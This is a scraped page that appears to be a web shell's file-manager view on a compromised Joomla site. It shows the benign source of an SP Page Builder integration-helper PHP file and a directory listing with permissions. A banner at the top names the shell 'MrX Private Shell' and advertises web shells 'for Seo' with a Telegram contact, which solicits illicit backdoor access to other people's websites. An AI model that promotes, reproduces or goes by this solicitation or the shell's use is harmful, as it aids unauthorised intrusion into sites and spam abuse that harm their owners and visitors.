__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* @package SP Page Builder
* @author JoomShaper http://www.joomshaper.com
* @copyright Copyright (c) 2010 - 2023 JoomShaper
* @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
use Joomla\CMS\Language\Text;
/** No direct access. */
defined('_JEXEC') or die('Restricted access');
/**
* Integration helper for the builder.
*
* @since 4.0.0
*/
class BuilderIntegrationHelper
{
public static function getIntegrations(): array
{
return [
'content' => [
'title' => Text::_("COM_SPPAGEBUILDER_JOOMLA_ARTICLE"),
'group' => 'content',
'name' => 'sppagebuilder',
'view' => 'article',
'id_alias' => 'id'
],
'spsimpleportfolio' => [
'title' => Text::_("COM_SPPAGEBUILDER_SP_SIMPLE_PORTFOLIO"),
'group' => 'spsimpleportfolio',
'name' => 'sppagebuilder',
'view' => 'item',
'id_alias' => 'id',
'frontend_only' => true,
],
'k2' => [
'title' => 'K2',
'group' => 'k2',
'name' => 'sppagebuilder',
'view' => 'item',
'id_alias' => 'cid'
]
];
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| tweet | Folder | 0775 |
|
|
| addon-helper.php | File | 8.71 KB | 0664 |
|
| ajax.php | File | 6.64 KB | 0664 |
|
| articles.php | File | 15.51 KB | 0664 |
|
| assets-css-parser.php | File | 1.97 KB | 0664 |
|
| auth-helper.php | File | 3.77 KB | 0664 |
|
| autoload.php | File | 3.06 KB | 0664 |
|
| constants.php | File | 322 B | 0664 |
|
| css-parser.php | File | 9.81 KB | 0664 |
|
| helper.php | File | 50.07 KB | 0664 |
|
| image.php | File | 2.98 KB | 0664 |
|
| integration-helper.php | File | 1.04 KB | 0664 |
|
| k2.php | File | 8.11 KB | 0664 |
|
| route.php | File | 2.2 KB | 0664 |
|